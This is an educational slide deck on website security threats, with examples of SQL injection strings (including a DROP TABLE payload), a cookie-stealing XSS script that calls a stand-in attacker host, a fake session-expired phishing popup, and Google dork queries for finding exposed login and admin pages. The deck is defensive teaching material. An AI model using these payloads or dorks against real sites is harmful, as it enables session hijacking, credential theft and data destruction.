Website Security
Project
Some Techniques That Could Be a Danger to Your Website
by
Bence Liska
2008-12-01
Website Security
We have to protect:
• Users’ information
(credit cards, passwords, profiles, etc.)
• Users’ cookies and sessions
• The administration web forms
• Customer information
• The content of the website
• The database of the website
Attack Types (Overviews)
Some techniques:
• SQL Injection
• Password Cracking
• Cross Site Scripting (XSS)
• Google Hacking
• Etc…
SQL Injection (1)
• Entering SQL code into web forms, or into the
browser address field.
• The attacker can get access to the website or to the
database behind the site.
SQL Injection (2)
Example 1:
• At the Server:
"SELECT * FROM users WHERE username = '" + $USRTEXT + "' AND password = '" + $PASSTEXT + "';"
• SQL Injections:
• ' OR 1=1; --
• admin'; --
• ') or ('a'='a
• ") or ("a"="a
• hi" or "a"="a
Result:
"SELECT * FROM users WHERE username = 'admin'; --' AND password = '';"
SQL Injection (3)
Example 2:
• At the Server:
"SELECT * FROM DATA WHERE id=" + $ID + ";"
• SQL Injection:
• 1;DROP TABLE users
• Result:
"SELECT * FROM DATA WHERE id=1;DROP TABLE users;"
SQL Injection (4)
• Preventing - Using Escaping
It is usual to escape parameters using the function
mysql_real_escape_string before sending the SQL query in PHP.
// mysql_real_escape_string() (PHP 5 mysql extension) escapes the quote
// characters in each value before it is placed inside the quoted SQL literal.
$query = sprintf("SELECT * FROM Users WHERE UserName = '%s' AND Password = '%s'",
    mysql_real_escape_string($Username),
    mysql_real_escape_string($Password));
mysql_query($query);
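Example 1 as an added, runnable illustration (not the deck's own code): the concatenated login query beside the same check with bound parameters, written in Python with the sqlite3 module and a constructed in-memory users table in place of the deck's PHP and MySQL. Escaping as shown above only helps where every value sits inside quotes; binding parameters removes the problem, because the driver never lets the values be parsed as SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the deck's `users` table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cret"), ("bob", "hunter2")])
    con.commit()
    return con


def login_concat(con, usrtext, passtext):
    """The deck's Example 1: the query string is built by concatenation,
    so quote characters in the input change the SQL itself (vulnerable)."""
    query = ("SELECT username FROM users WHERE username = '" + usrtext
             + "' AND password = '" + passtext + "'")
    return [row[0] for row in con.execute(query)]


def login_param(con, usrtext, passtext):
    """Same check with the values bound as parameters: the driver passes
    them as data, so they can never be parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(query, (usrtext, passtext))]


if __name__ == "__main__":
    db = make_db()
    # The deck's injection strings entered as the username, with an empty password.
    for payload in ["' OR 1=1; --", "admin'; --"]:
        print(repr(payload), "concat:", login_concat(db, payload, ""),
              "param:", login_param(db, payload, ""))
```

With the concatenated query the first payload matches every user and the second logs in as admin without a password; the parameterized query matches nobody for either.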
Password Cracking (1)
• Dictionary attack
Users often choose weak passwords. The
dictionary has a list of single words.
• Brute force attack
This attack tries every possible password to
get access to the user account on the website.
(It is too slow.)
Password Cracking (2)
• Precomputation (Rainbow table)
• Most websites store the user’s password (and name)
as a hash code. If we have the hash we can find the
plaintext by rainbow tables.
• Rainbow table: storing the (plaintext, ciphertext) pairs.
• Preventing
• Attackers must not get access even to the encrypted
password.
• The users have to use only strong passwords.
Cross Site Scripting (XSS)
• Typically found in web applications which
allow code injection by malicious web users
into the web pages viewed by other users.
Diagram (cookie theft via XSS). Participants: Attacker, User, Attacker’s web server, Website.
1. "log" code
2. JavaScript code
3. login
4. send cookie
5. read the log
Example 1:
Other cookie theft JavaScript:
<script>new Image().src="http://attacker/log.php?c="+encodeURI(document.cookie);</script>
Example 2:
Example 3:
<SCRIPT>
var oF = window.open("", "", "width=275, height=175, top=200, left=250, location=no, menubar=no, status=no, toolbar=no, scrollbars=no, resizable=no");
// HTML FORM with POST request
oF.document.write("Your session has expired"...);
</SCRIPT>
Google Hacking (1)
• Using Google (or other search engines),
"search engine hackers" can easily find
exploitable targets and sensitive data.
• Example 1:
WordPress suffers from possible XSS attacks.
Find WordPress login forms:
intitle:"WordPress > * > Login form"
inurl:"wp-login.php"
Google Hacking (2)
• Example 2:
Phpinfo outputs lots of PHP information.
<?php
// Show all information, defaults to INFO_ALL
phpinfo();
// Show just the module information.
// phpinfo(8) yields identical results.
phpinfo(INFO_MODULES);
?>
Find Phpinfo pages:
intitle:phpinfo "PHP Version"
Google Hacking (3)
• Example 3:
phpMyAdmin is a web UI for managing MySQL
databases.
Find phpMyAdmin pages:
inurl:main.php Welcome to phpMyAdmin
A Few Defensive Measures
• If you use a CMS or another publishing platform or
framework, you have to update to new versions as
soon as possible.
• If you have an admin page on your website, do not call
it “admin.php” or “AdminLogin.php”; rename it.
Call it, for example, “dog.php” or “hamburger.php”.
• Try to enter some confusing data into your own login
fields, like the sample injection strings, and anything else
which you think might confuse the server.
• Do a few Google hacks on your name and your
website. Just in case…
Thank you!